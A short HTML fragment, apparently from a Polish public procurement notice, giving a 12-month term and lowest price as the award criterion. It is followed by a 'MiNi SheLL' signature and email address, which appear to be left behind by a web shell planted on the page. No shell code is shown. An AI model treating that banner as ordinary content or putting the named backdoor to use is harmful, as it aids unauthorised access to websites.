<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com